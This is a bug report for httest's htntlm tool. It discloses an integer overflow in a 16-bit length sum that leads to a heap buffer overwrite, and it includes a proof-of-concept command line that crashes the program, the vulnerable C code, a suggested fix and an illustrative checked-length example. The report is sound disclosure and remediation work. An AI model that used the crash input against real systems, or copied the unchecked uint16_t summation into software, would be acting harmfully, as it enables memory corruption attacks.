Integer Overflow in /src/htntlm.c (version<=2.4.24)
Brought to you by:
ia97lies
An integer overflow was found in /src/htntlm.c (version<=2.4.24); it leads to a heap buffer overwrite. Proof of concept:
./htntlm -w -t 2 -T `python -c "print 'a'*0x8000"` -D `python -c "print 'a'*0x4000"`
Output:
Segmentation Fault
The program crashes in function write_type2_msg:
    len16 = handle_unicode(hook, &tmp, hook->target);
    *((uint16_t *)&msg[12]) = ntlm_hton16(len16);
    *((uint16_t *)&msg[14]) = ntlm_hton16(len16);
    *((uint32_t *)&msg[16]) = ntlm_hton32(48 + offset);
    memcpy(&msg[48 + offset], tmp, len16);
msg is allocated with apr_pcalloc at:
    if (tlen16) {
      /* target info termination */
      tlen16 += 4;
    }
    len += tlen16;
    /* allocate message initialize with zeros*/
    msg = apr_pcalloc(hook->pool, len);
and the uint16_t tlen16 is computed by:
    if (hook->target) {
      tlen16 += handle_unicode(hook, NULL, hook->target);
    }
    if (hook->domain) {
      tlen16 += 4 + to_unicode(hook->pool, NULL, hook->domain);
    }
    if (hook->server) {
      tlen16 += 4 + to_unicode(hook->pool, NULL, hook->server);
    }
    if (hook->dns_domain) {
      tlen16 += 4 + to_unicode(hook->pool, NULL, hook->dns_domain);
    }
    if (hook->dns_server) {
      tlen16 += 4 + strlen(hook->dns_server);
      tlen16 += 4 + to_unicode(hook->pool, NULL, hook->dns_server);
    }
    if (tlen16) {
      /* target info termination */
      tlen16 += 4;
    }
There is no code that checks the length of these strings. Their UTF-16 lengths are summed into the 16-bit tlen16, which wraps modulo 65536 once the total exceeds 65535. The message buffer is then allocated from the wrapped (too small) length, while the later memcpy copies the full converted string, so the write runs past the end of msg.
Fix: check the length of the strings before summing them, or accumulate in the wider size_t and reject totals that do not fit in the 16-bit length field.
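To make the wrap-around concrete, the following added example (not httest's code) models the tlen16 accumulation in isolation: one version keeps the uint16_t accumulator from the report, the other accumulates in size_t and refuses any total that will not fit the 16-bit length field. The helper utf16_len, the field names and the assumption that each field contributes a 4-byte header plus twice its byte length are simplifications chosen for the illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed model: converting an ASCII string to UTF-16 doubles its byte length.
 * This stands in for to_unicode()/handle_unicode() from the report. */
static size_t utf16_len(const char *s) {
    return s ? 2 * strlen(s) : 0;
}

/* Same shape as the vulnerable accumulation: the uint16_t sum wraps silently. */
uint16_t target_info_len_u16(const char *target, const char *domain, const char *server) {
    uint16_t tlen16 = 0;
    if (target) tlen16 += utf16_len(target);          /* truncated to 16 bits */
    if (domain) tlen16 += 4 + utf16_len(domain);
    if (server) tlen16 += 4 + utf16_len(server);
    if (tlen16) tlen16 += 4;                           /* target info termination */
    return tlen16;
}

/* Hardened variant: sum in size_t, then check the total against the 16-bit
 * field the NTLM message carries. Returns false instead of a wrapped length. */
bool target_info_len_checked(const char *target, const char *domain,
                             const char *server, uint16_t *out) {
    size_t total = 0;
    if (target) total += utf16_len(target);
    if (domain) total += 4 + utf16_len(domain);
    if (server) total += 4 + utf16_len(server);
    if (total) total += 4;
    if (total > UINT16_MAX) return false;              /* would not fit: reject */
    *out = (uint16_t)total;
    return true;
}

/* Constructed input helper: a heap string of n copies of c (caller frees). */
char *repeat(char c, size_t n) {
    char *s = malloc(n + 1);
    if (!s) return NULL;
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

int main(void) {
    /* Same sizes as the proof of concept: 0x8000 bytes of target, 0x4000 of domain. */
    char *target = repeat('a', 0x8000);
    char *domain = repeat('a', 0x4000);
    uint16_t checked = 0;

    printf("wrapped uint16 length : %u\n", target_info_len_u16(target, domain, NULL));
    printf("checked length fits   : %s\n",
           target_info_len_checked(target, domain, NULL, &checked) ? "yes" : "no (rejected)");

    free(target);
    free(domain);
    return 0;
}
```

With the proof-of-concept sizes the uint16_t version reports 0x8008 bytes although the real total is 0x18008, which is exactly the gap between the allocation and the memcpy; the checked version returns false so the caller can fail the request instead of building an undersized buffer.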